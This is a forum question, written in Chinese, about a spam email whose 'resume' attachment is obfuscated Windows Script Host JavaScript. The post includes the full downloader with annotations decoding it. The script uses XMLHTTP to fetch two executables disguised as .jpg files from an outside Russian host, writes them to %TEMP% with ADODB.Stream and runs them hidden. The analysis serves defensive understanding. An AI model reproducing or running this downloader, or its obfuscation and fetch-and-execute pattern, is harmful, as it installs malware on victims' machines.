很抱歉,如果这里不是合适的提问地点,或者这个问题更适合别的板块,请告诉我!
我收到了一封发到我工作邮箱的、特别有趣的垃圾邮件。它号称是某人的简历,但实际上是一段高度混淆的 JavaScript。看起来它试图通过 ActiveX 启动一个 Windows 可执行文件。我认为攻击者的目标是让收件人直接把这个 .js 文件当作 Windows 脚本运行。
我在一台 Windows 7 计算机上运行它,Symantec Endpoint 以“Suspicious executable image download”警告将其拦截。
我又在一台没有安装任何防病毒软件的 Windows XP 虚拟机中运行它,收到了这样的弹出通知:
2865241.exe - 应用程序错误:应用程序无法正确初始化(0xc0000135)。单击“确定”以终止应用程序。
然后是来自 Windows Script Host 的错误:
Script: C:\path\to\Resume Jaime Harding.js
Line: 9
Char: 1
Error: Write to file failed.
Code: 800A0BBC
Source: ADODB.Stream
所以它实际上是在尝试把一个二进制文件写到磁盘上并运行它吗?它想达到什么目的?它为什么失败了?我扮演了“容易上当的邮件收件人”的角色运行了它,结果它直接崩溃了。在什么样的环境下它才会成功?
许多乱码看起来很可能是故意取得难看的变量名,被当作 window 的属性来使用。但是其中有很多 "charAt",所以那些字符串可能只是诱饵,脚本只是从中提取某些字符来使用。
一些“函数”的参数以 (/regex/g, "") 的形式传入,所以看起来它是在试图从字符串中过滤掉垃圾字符,但我看不出实际调用的地方是否真的是 replace。
以下就是那段 JS,它经过高度混淆。为了可读性,我对它做了一些格式化(prettify)处理。
// NOTE(review): obfuscated Windows Script Host (WSH) downloader, kept verbatim for analysis.
// Nearly every identifier is noise; the only real work happens in Kg3() and the two calls to it
// near the bottom. The obfuscation is purely static (no eval / new Function), so every string can
// be recovered by reading the code:
//   - str["replace"](/[junk]/g, "") strips filler characters and yields the real string;
//   - str[(N)["toString"](base)](/[junk]/g, "") indexes a property whose name is the number N
//     printed in that base -- e.g. 16365588719 in base 29 is "replace" -- so these are also
//     replace() calls on junk strings;
//   - ternaries such as (73 > 45 ? "\x70" : "\x68") are constant and merely spell out method names;
//   - numeric expressions built from "..."["length"] / "..."["charCodeAt"](i) and assigned to
//     names that are never read are dead decoys; many are assigned without `var` (implicit globals).
// Observed chain: MSXML2.XMLHTTP (download) -> ADODB.Stream (write to %TEMP%) -> WScript.Shell.Run
// (execute). From a defender's view this is the classic script-attachment downloader pattern:
// wscript.exe launched from a mail attachment, then an .exe written to %TEMP% and started hidden.
(function () {
// Dead decoy assignments; nothing below reads them.
var D2p = (8.0 + "'=+)D]R.MPjS"["length"] * 28);
kOY = ("\x89\x60eYE;U\x83L^SP'yp"["charCodeAt"](6) * 0 + 18.0);
qEI = "N9-0GO3m8/d*VI4&g)tG*k"[("=[TOcgnm7St5a(hUdK,?"["charCodeAt"](13) * 409139717 + 39.0)["toString"](("xA\x85Ru6-iU{*c~\x87\x86("["charCodeAt"](5) * 0 + 29.0))](/[m\-\*I0tNO\)\&\/]/g, "");
T7Y = "6Y=0oSknwWp[U&qjKCBF*L"[("<e.y\x8bZ2fX\x7f"["charCodeAt"](2) * 921305672 + 22.0)["toString"]((34.0 + "NuU\x7f/\x8a\x8683y$EY<f&{x"["charCodeAt"](8) * 0))](/[\*Kj\&\=6wW\[oBk]/g, "");
var Ecf = (88 * "\x85P<S\x82"["length"] + 0.0);
Tkv = ("T_e8\x83\x87X|fA\x80I\x89{\x85"["length"] * 2 + 3.0);
var Cq7 = "AGREkUTp8D&bJGdZ;qL0QsP"[(9.0 + "u\x800]\x89@ye\x88\x8aWajvT="["charCodeAt"](10) * 280311852)["toString"]((3.0 + "<$*,?Rn"["length"] * 4))](/[RJ\&pLQkUd8As\;]/g, "");
var ZTl = "`S75d`QHS@garJi50+94Y0"["replace"](/[Y\@\+HJ79a5\`]/g, "");
LIm = "AGt9>wrW66389bs4a0Yv72"["replace"](/[rAs8a\>Ybt67]/g, "");
gF9 = "#ni`1z0c~_w-vamT4uC7Fc%G"[(12.0 + "\x83%Q\x880\x8b*asr\x82;W"["length"] * 3877454369)["toString"]((5 * "_YKyr\x82"["length"] + 5.0))](/[\-\%4Fm\#0C\~1\_\`vn]/g, "");
var Uwg = "QwFnSfAc07q2MpO!]P*HzbZ"[(4.0 + "CHE'zl+]e4"["length"] * 4238006093)["toString"]((34.0 + "1y.\x89d/}n*6\x7f\x88w"["charCodeAt"](8) * 0))](/[z\!f27\*Qw\]npcb]/g, "");
// Kg3(fr, KPA, rn): fetch the URL `fr` over HTTP, save the response body as %TEMP%\<KPA>,
// and, when rn > 0, execute that file. Errors in the request/run path are swallowed (see catch).
function Kg3(fr, KPA, rn) {
// Stripping the junk class from "]W_SFc)rHi7p_tz.TSv%hB_eKl5l" leaves "WScript.Shell".
var ERG = new ActiveXObject("]W_SFc)rHi7p_tz.TSv%hB_eKl5l"["replace"](/[\)KT\%vzF\_7\]5HB]/g, ""));
var mE6 = ("Ov\x81xP*sX\x80"["length"] * 11 + 4.0); // decoy
// Resolves to ERG.ExpandEnvironmentStrings("%TEMP%") + "\" (char 92) + KPA. The `var KPA`
// re-declaration does not reset the parameter; it rewrites KPA into the full path in the
// user's temp directory, which is the file written and executed below.
var KPA = ERG["Ex" + (73 > 45 ? "\x70" : "\x68") + "andEnvironmentSt" + "" + (77 > 7 ? "\x72" : "\x6d") + "ings"]("G%oT&EySM&PXX%"[("iIopR\x809O2\x82PtYg:'[}#"["charCodeAt"](12) * 225213779 + 43.0)["toString"]((0.0 + "OJN.R%\x8angI"["length"] * 3))](/[\&SXGyo]/g, "")) + String["f" + "romCharCod" + (81 > 5 ? "\x65" : "\x5e") + ""](92) + KPA;
var j$2 = "qv3zu6Sa7FdMeSbxt~*fklyGQu"[(43.0 + "5Hd|tb/M3Yx\x87e"["charCodeAt"](6) * 1269417725)["toString"]((0 * "Wv1jN\x88G\x81muC4nVx#w<"["charCodeAt"](11) + 36.0))](/[G\*6qvl\~kxSQFMz7]/g, ""); // decoy
// "MSXML2.XMLHTTP" once the junk class is stripped: the HTTP client used for the download.
var Ttc = new ActiveXObject("kM+SGNXfMFfLD2g.kX[mM#L3H`qTFT/AP"["replace"](/[\/NkqF\[\#\+G\`gADmf3]/g, ""));
QBc = "efbNd<t&A&q@4%`8RFLI29CH"["replace"](/[\`9\<edI\@R\&\%CLb]/g, ""); // decoy (implicit global)
// Ttc.onreadystatechange: once the response is complete, write its body to disk.
Ttc["onre" + (78 > 3 ? "\x61" : "\x5a") + "dys" + "t" + (71 > 45 ? "\x61" : "\x5c") + "techange"] = function () {
// Ttc["readyState"] === 4, i.e. the request has finished.
if (Ttc["r" + "eadyStat" + (98 > 18 ? "\x65" : "\x60") + ""] === 4) {
// "ADODB.Stream" after stripping: a binary stream used to persist the response body as a file.
var OF$ = new ActiveXObject("-AlDROqDWBJ.ESz!tbir#eH[a&lm"["replace"](/[H\#JWi\-E\!\[zqR\&lb]/g, ""));
var Jwu = ("08#\x89:{\x83\x81[UR]2I"["charCodeAt"](10) * 4 + 60.0); // decoy
// OF$.open()
OF$["o" + "" + (58 > 34 ? "\x70" : "\x67") + "en"]();
// Four decoys.
i61 = "eJj7XqxlFeC5B_1RsHQt!1"["replace"](/[QXje\!5sx\_Rl]/g, "");
izb = ("U}o=Q8(c<\x8bO-|.5^"["charCodeAt"](6) * 2 + 34.0);
var zyH = (10.0 + "\x80LF:,n'1-c0\x8a="["length"] * 11);
var k3C = ";n@E2LaW=0GNTs-1JT!OTce"["replace"](/[T\=\;1\-\!ca\@G2]/g, "");
// OF$.type = 1 -- binary mode, so the bytes are written unmodified.
OF$["" + "t" + (91 > 18 ? "\x79" : "\x72") + "pe"] = 1;
var EKM = "Ncvs&1RzLd8Qt7Z-~M(YQfrp"[("-*\x84f\x86N\x8b6Tn{qgw3yl\x7fK"["charCodeAt"](5) * 454460829 + 5.0)["toString"](("\x89/(,TD#e<kyn%+.xW"["charCodeAt"](13) * 0 + 33.0))](/[c7\(R\-s\~\&r8NQL]/g, ""); // decoy
// OF$.write(Ttc.ResponseBody) -- the raw downloaded bytes go into the stream.
OF$["wri" + (76 > 16 ? "\x74" : "\x6a") + "" + "e"](Ttc["R" + (94 > 34 ? "\x65" : "\x5b") + "s" + "ponseB" + (85 > 2 ? "\x6f" : "\x65") + "dy"]);
PDX = (31.0 + "5IY9?r\x896B{i1*Re"["charCodeAt"](12) * 6); // decoy
// OF$.position = 0 -- rewind before saving.
OF$["" + "posi" + (77 > 29 ? "\x74" : "\x6a") + "ion"] = 0;
v$8 = (2.0 + "b&|\x8b)gY\x83"["length"] * 61); // decoy
// OF$.saveToFile(KPA, 2): mode 2 overwrites an existing file, so %TEMP%\<name> is replaced
// unconditionally. The WSH dialog quoted in the post (Source: ADODB.Stream, code 800A0BBC,
// "Write to file failed") is most likely raised by this call; it sits outside the try/catch
// below, which is consistent with the error surfacing as an unhandled script error.
OF$["saveT" + (79 > 38 ? "\x6f" : "\x68") + "F" + "" + (85 > 43 ? "\x69" : "\x62") + "le"](KPA, 2);
W2Q = "(DLsxL6Ll0a(OC]trZBv`b"[(")=\x88\x81>"["length"] * 10081381361 + 4.0)["toString"]((0 * "aWi\x80/4h\x60uIcJbt-^,'"["charCodeAt"](17) + 35.0))](/[\(OBx0r\`\]L]/g, ""); // decoy
// OF$.close()
OF$["c" + "los" + (94 > 26 ? "\x65" : "\x5b") + ""]();
var ue0 = "MT3gL29u`i-u4k3eR8N+o"["replace"](/[4\+\`L8MR93\-]/g, ""); // decoy
}
;
var xbw = "MY<m6do1bcJs;j3mCP7c"[(283571292 * "GbS4sw#qE*\x7f)\x87V"["charCodeAt"](13) + 21.0)["toString"]((3 * "57e2>-m+"["length"] + 7.0))](/[\<3MoJ67b\;C]/g, ""); // decoy
};
var b$y = ("\x86mjoi\x87n.(y0#,Y"["length"] * 2 + 0.0); // decoy
Teq = "80u3mip>VfE-Mnlk9@[L*yEc"[("v({w>Y<qr#3-="["length"] * 3877454369 + 12.0)["toString"](("pm\x60oO(EeT<w"["charCodeAt"](5) * 0 + 35.0))](/[\[V0\*kEi3\@\>\-8n]/g, ""); // decoy
try {
// Ttc.open("GET", fr, false): ";GoE%T" minus the junk class is "GET"; `false` makes the request
// synchronous, so send() below blocks until the response (and, presumably, the handler above) is done.
Ttc["o" + "p" + (65 > 36 ? "\x65" : "\x5e") + "n"](";GoE%T"["replace"](/[o\%\;]/g, ""), fr, false);
lw7 = "fte5jz9s_Yt=DIb]aB!6IB"[(1050143891 * "5~K<\x60c0>lC@=E("["charCodeAt"](6) + 41.0)["toString"]((0 * "p4uV?rw.'\x83m|\x86"["charCodeAt"](4) + 35.0))](/[\!\_9\=faIeY\]j]/g, ""); // decoy
var jLj = "`=e;E_fhW2c/F8njVljt(G"["replace"](/[\`\/\;lj2\(h\_\=8]/g, ""); // decoy
// Ttc.send()
Ttc["" + "s" + (53 > 26 ? "\x65" : "\x5c") + "nd"]();
var X2P = (41 * "&S_R8gA'v"["length"] + 7.0); // decoy
// When rn > 0: ERG.Run(KPA, 0, 0) -- WScript.Shell.Run with window style 0 (hidden) and no
// wait. Both callers pass rn = 1, so every downloaded file is executed. This is the step that
// produced the "2865241.exe - application error 0xc0000135" dialog in the post: the file was
// written and launched, and 0xc0000135 (STATUS_DLL_NOT_FOUND) indicates the payload itself could
// not initialise on that XP VM rather than the script failing.
if (rn > 0) {
ERG["R" + "" + (55 > 18 ? "\x75" : "\x6e") + "n"](KPA, 0, 0);
pcx = "oHzfN0Bajv]M5Tpy(Ssik=Kt"[(9.0 + "=h)$[\x84>:8#MIZ-fK}"["charCodeAt"](7) * 869084600)["toString"]((35.0 + "Ul\x88\x84^ObN+:Q>HomiJqg"["charCodeAt"](9) * 0))](/[\=5jKapiS\(zo\]N0]/g, ""); // decoy
}
;
// Three decoys.
var FmH = "7_3QTXRgjK6+mj/4!2&h[ml"[("djG\x80\x8bMk\x814&geJ/\x86#\x83s"["charCodeAt"](5) * 382957200 + 62.0)["toString"]((32.0 + "\x84h4qDZ2j$\x817C"["charCodeAt"](2) * 0))](/[Q\/gK\+7X\_\&\[m\!]/g, "");
sIy = (36.0 + "O8^\x88aSZN&Ts"["charCodeAt"](9) * 4);
VBS = (17 * "$jG)r^o\x894Oc5"["length"] + 1.0);
} catch (er) {
// Deliberately empty: a failed download or Run is silently ignored so the script exits quietly.
}
;
sKc = "l2iC]fvA]f8b7aTzyIkY9[vq"["replace"](/[72I8\[vyTCYl\]]/g, ""); // decoy
}
// First payload. Applying the replace() calls by hand, the URL argument appears to decode to
// http://davis1.ru/images/one.jpg and the file name to "2865241.exe" (matching the dialog quoted
// in the post); rn = 1, so it is executed after download. The ".jpg" name is a disguise for an
// executable download -- the Symantec "Suspicious executable image download" verdict fits this.
Kg3("qhAtyt<zpx5:X/>/DdMa@vciksl1x>.=Ir7uK/Ri0m2a`gIe-%s0/6Ooqn]e)!.7]jNpKg"["replace"](/[qyKADO\%\-67\)\>R\`I5\@z\<0N2\=\!klxM\]cX]/g, ""), "L2MP8&6@5s2s4Q1().ibeaxYe"[(672699379 * "\x81\x7f{=%\x85+tE~?DP"["charCodeAt"](10) + 57.0)["toString"]((6.0 + "A\x86hk8DU\x82G6390."["length"] * 2))](/[ab\&Yi\)\@s\(PQLM]/g, ""), 1);
// Decoys between the two payload calls.
iBR = "~UcONvQg!zT2P(RXe-k(Pp"[(3977508874 * "{2\x7f\x82A\x83S\x88\x84gW~c%P"["length"] + 8.0)["toString"]((0 * "Gk5o~$\x89;2^:plS&gUhnR"["charCodeAt"](10) + 36.0))](/[NQTP\(\-Xc\~\!]/g, "");
var TAb = (2.0 + "B%;'(W]0JaEi\x898_"["length"] * 1);
Jfj = "Qk*rH@UKlsg5O->f`4~iyz"[(2032260927 * ",2\x84\x8b\x60P_[;Qtg"["length"] + 9.0)["toString"]((1.0 + "pQdk["["length"] * 6))](/[\-\~\`sK\@Qy\>\*5r]/g, "");
dkD = "`aL1;xbr;eJkDA)R*hoM"[(62.0 + ";[DY7J:K\x85\x88x$3t<"["charCodeAt"](7) * 393169392)["toString"]((0 * ";fud=6t(%\x80\x82+y^m"["charCodeAt"](8) + 32.0))](/[L\)o\`J\*bD\;]/g, "");
Hz9 = "zNiGSF9+7WHUhpZxILHEM"["replace"](/[F\+pULEzSixW]/g, "");
// Second payload, same shape: the URL appears to decode to http://davis1.ru/images/two.jpg and
// the file name to "1246549.exe"; again rn = 1. Both hosts/paths and both file names are the
// indicators worth blocking or hunting for in proxy and endpoint logs.
Kg3("Bhxt(tZ%pfM:#/Y/%nd3a;vGxiNs8R1N.kr>uTD/ficmTaKg5e&s4J/]tEwWoJ.EjH%pcg"[(7089588933 * "z_OC("["length"] + 2.0)["toString"]((33.0 + "PRybeAL>6;U\x87"["charCodeAt"](9) * 0))](/[4DKJ5RY\(3NM\%cx\]Hn\>ET\&WfkG\#\;8ZB]/g, ""), "S1-2+40605X4[9=.pelx;e"[(68.0 + "T|YL[u;<UR\x83x?\x80D~\x8b2b"["charCodeAt"](8) * 701913330)["toString"](("\x8a)jUF4$^e\x7fy;{WL_d]Xg"["charCodeAt"](6) * 1 + 0.0))](/[lX\-S\;\=\[p0\+]/g, ""), 1);
// Trailing decoys; the IIFE then ends. The last statement relies on the newline (no semicolon).
sZV = (1 * "p\x83jcq\x88d6\x85g[Ca&"["charCodeAt"](7) + 24.0);
var q3y = "+mp&uoRvn/GXa`rJKxKzW"[(33.0 + "|P,Ehf7\x8a\x82QN0X"["charCodeAt"](6) * 1084775147)["toString"]((6.0 + "^d\x896m2?:\x83\x8b"["length"] * 3))](/[\`mxoXz\/vJ\+\&]/g, "");
var vQ8 = "TAM~6=&uHrQcF=p3sOqS~81C"[(308784692 * "\x60,'3OKskndZw\x8b5iRgGN"["charCodeAt"](13) + 43.0)["toString"](("+O6hr>Vn8_0zktN"["length"] * 1 + 14.0))](/[TQ\&3\~OqM\=H1c]/g, "")
})();//p061q4Iu1W